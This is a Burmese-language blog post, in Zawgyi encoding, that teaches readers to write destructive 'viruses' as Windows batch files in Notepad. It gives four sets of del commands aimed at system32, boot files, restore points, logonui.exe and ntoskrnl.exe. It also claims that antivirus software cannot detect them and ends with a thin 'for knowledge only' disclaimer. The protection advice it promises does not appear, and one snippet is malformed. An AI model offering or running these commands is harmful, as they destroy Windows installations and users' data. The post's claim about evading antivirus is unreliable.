က်ေနာ္လည္း project အသစ္တစ္ခုအတြက္ လံုးပန္းေနတာနဲ႔ ဘာမွ အသစ္မေရးျဖစ္ဘူး ျဖစ္ေနတယ္ဗ်ာ.. ။ လာလာလည္ၾကတဲ႔ သူမ်ားကို အားလည္းနာ၊ ေက်းဇူးလည္း တင္ပါတယ္။ က်ေနာ္ မေရးေတာ႔ဘူးလို႔ ဆံုးျဖတ္ထားတာ တစ္ခုကို ေရးလိုက္ပါ႔မယ္ ။ အခု ေျပာျပမွာက တကယ္ကို အႏ ၱရာယ္ ရိွတဲ႔ Virus ေရးနည္း ျဖစ္ပါတယ္ ။ အမ်ိဳးမ်ိဳးရိွ ၾကေပမယ္႔ ေလ႔လာမိသေလာက္ ေရးနည္း က ဒါေတြပါပဲ ။ မစိုးရိမ္ပါနဲ႔ ထံုးစံ အတိုင္း Virus ကာကြယ္ေရးပါ ေျပာျပပါ႔မယ္။ notepad နဲ႔ Virus ေရးမယ္ဆိုရင္ ေတာ္ေတာ္မ်ားမ်ား ေအာက္ပါအတိုင္းပဲ ေရးပါတယ္။
1………….
@echo del off C:\\windows\system32
2………….
@echo off
del C:\\windows\system32

3………….
del “C:\windows\system32\bootok” /Q/S >nul
del “C:\windows\system32\bootvid” /Q/S >nul
del “C:\windows\system32\bootvrfy” /Q/S >nul
4………….
del “C:\windows\pchealth\”
del “C:\windows\system\”
del “C:\windows\system32\restore”
del “C:\windows\system32\autoexec.nt”
del “C:\windows\system32\logonui.exe”
del “C:\windows\system32\ntoskrnl.exe”
စတာေတြကို ေရးၿပီး ဖိုင္နာမည္ကို ႀကိဳက္ရာေပး File type ကိုေတာ႔ .bat,.exe နဲ႔ save ႏိုင္ပါတယ္။(ဥပမာ – filename.bat , filename.exe)အေပၚမွာ ၄ မ်ိဳး ဥပမာျပတာပါ။ အမ်ားႀကီး ကိုရိွပါတယ္။ ဒီေလာက္ျမင္ၿပီးရင္ေတာ႔ သေဘာေပါက္ ေလာက္ပါၿပီေနာ္။ del ဆိုတာက ျဖတ္ျပစ္ဖို႔ command ေပးတာ ျဖစ္ပါတယ္။ ဘာေတြကိုျဖတ္ဖို႔လဲ ဆိုတာ အေပၚမွာ ျမင္တဲ႔ အတိုင္းပါပဲ ။ window program အရ bat ဖိုင္နဲ႔ command ေပးၿပီး ျဖတ္ေစတာ ျဖစ္လို႔ ဘယ္ Antivirus နဲ႔မွ မမိပါဘူး။ notepad မွာေရးတဲ႔႔ command code ေတြသိခ်င္ ေတာ႔ ဒီမွာသြားၾကည္႔ ႏိုင္ပါတယ္။
( အထက္ပါေဖာ္ျပထားေသာ Virus ၄မ်ိဳး မွာ တကယ္ အႏ ၱရာယ္ရိွတဲ႔ virus မ်ားျဖစ္ပါတယ္။ စမ္းသပ္ရန္မဟုတ္ပါ။ တစ္ဦးတစ္ေယာက္အား ဒုကၡေပးရန္လည္း မဟုတ္ပါ။ ဗဟုသုတေပးရန္သာ ရည္ရြယ္ပါသည္။ )
အရမ္းေတာ္လို ့ေတာ ့မပာုတ္ပါသိသေလာက္ေတာ ့ရွင္းျပျခင္းျဖစ္ပါသည္